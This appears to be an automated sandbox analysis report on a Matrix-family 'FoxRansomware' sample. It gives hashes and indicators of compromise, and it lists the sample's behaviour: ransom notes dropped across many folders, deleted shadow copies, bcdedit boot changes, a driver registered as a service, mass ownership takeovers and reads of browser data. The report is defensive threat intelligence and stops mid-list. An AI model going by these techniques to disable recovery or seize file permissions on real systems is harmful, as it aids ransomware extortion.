Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
147s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pl\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\plugins\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ca\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Office 15\ClientX64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\EdgeUpdate\Log\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\be\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}v48.100.4028\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mr\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Documents\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fa\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\dotnet\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\USOShared\Logs\System\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\ClickToRun\ProductReleases\F043C3F9-0337-4447-9BD6-366E2FB64736\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 5776 bcdedit.exe 2428 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 152 3900 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
otHboBGk64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS otHboBGk64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
otHboBGk64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" otHboBGk64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 64 IoCs
Processes:
NWvak0Th.exeotHboBGk.exeotHboBGk64.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exeotHboBGk.exepid process 4080 NWvak0Th.exe 4792 otHboBGk.exe 2532 otHboBGk64.exe 5568 otHboBGk.exe 5956 otHboBGk.exe 3068 otHboBGk.exe 3888 otHboBGk.exe 5660 otHboBGk.exe 5384 otHboBGk.exe 3116 otHboBGk.exe 3572 otHboBGk.exe 5584 otHboBGk.exe 4592 otHboBGk.exe 5892 otHboBGk.exe 6084 otHboBGk.exe 5800 otHboBGk.exe 6140 otHboBGk.exe 5664 otHboBGk.exe 6088 otHboBGk.exe 5340 otHboBGk.exe 2420 otHboBGk.exe 5464 otHboBGk.exe 5788 otHboBGk.exe 3200 otHboBGk.exe 4296 otHboBGk.exe 5284 otHboBGk.exe 5308 otHboBGk.exe 4720 otHboBGk.exe 4320 otHboBGk.exe 5344 otHboBGk.exe 820 otHboBGk.exe 212 otHboBGk.exe 4884 otHboBGk.exe 6128 otHboBGk.exe 5360 otHboBGk.exe 3708 otHboBGk.exe 2232 otHboBGk.exe 2936 otHboBGk.exe 4008 otHboBGk.exe 5448 otHboBGk.exe 6008 otHboBGk.exe 5736 otHboBGk.exe 5792 otHboBGk.exe 4040 otHboBGk.exe 4212 otHboBGk.exe 5176 otHboBGk.exe 6020 otHboBGk.exe 3708 otHboBGk.exe 5852 otHboBGk.exe 920 otHboBGk.exe 3608 otHboBGk.exe 4884 otHboBGk.exe 6068 otHboBGk.exe 2568 otHboBGk.exe 280 otHboBGk.exe 5644 otHboBGk.exe 4008 otHboBGk.exe 2428 otHboBGk.exe 5184 otHboBGk.exe 3572 otHboBGk.exe 2560 otHboBGk.exe 5908 otHboBGk.exe 5596 otHboBGk.exe 5536 otHboBGk.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 6076 takeown.exe 5516 4484 4944 3572 5596 takeown.exe 5848 takeown.exe 5432 takeown.exe 5968 takeown.exe 4488 5264 4488 takeown.exe 5716 takeown.exe 5560 takeown.exe 5636 takeown.exe 652 takeown.exe 5732 takeown.exe 6020 takeown.exe 5620 takeown.exe 1948 3980 5684 takeown.exe 2480 takeown.exe 5744 takeown.exe 1456 takeown.exe 2596 takeown.exe 5392 takeown.exe 6112 4288 2288 takeown.exe 5524 takeown.exe 300 takeown.exe 6100 4660 takeown.exe 2744 takeown.exe 3592 5136 takeown.exe 5776 5980 takeown.exe 4320 takeown.exe 3488 takeown.exe 1300 takeown.exe 1816 4776 takeown.exe 5924 takeown.exe 4408 2264 5988 takeown.exe 5812 takeown.exe 5148 takeown.exe 4948 takeown.exe 6140 5724 takeown.exe 6032 takeown.exe 3336 takeown.exe 4024 6104 276 6140 takeown.exe 3616 takeown.exe 5224 takeown.exe 3996 takeown.exe 2608 5772 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exe upx behavioral6/memory/4792-782-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5568-2014-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5956-2029-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3068-2498-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3888-2558-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5660-2683-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5660-2785-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5384-2840-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3116-3438-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3572-3440-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5584-3643-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4792-3644-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4592-3740-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5892-4266-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6084-4268-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5800-4272-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6140-4274-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5664-4557-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6088-4587-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5340-4825-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2420-4839-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5464-5037-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5788-5214-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3200-5715-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4296-5717-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5284-5950-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5308-5952-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4720-6133-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4320-6261-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5344-6481-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/820-6483-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/820-6484-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/212-6486-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/212-6487-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4884-6491-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6128-6493-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5360-6502-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5360-6562-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3708-6642-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2232-6711-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2936-6766-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4008-6770-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5448-6773-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6008-6776-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5736-6778-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5792-6780-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4040-6784-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4212-6787-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5176-6789-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6020-6791-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3708-6793-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5852-6795-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/920-6799-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3608-6801-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4884-6803-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6068-6805-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2568-6807-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/280-6809-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5644-6813-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4008-6814-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2428-6815-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5184-6816-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3572-6820-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File opened for modification C:\Users\Admin\3D Objects\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 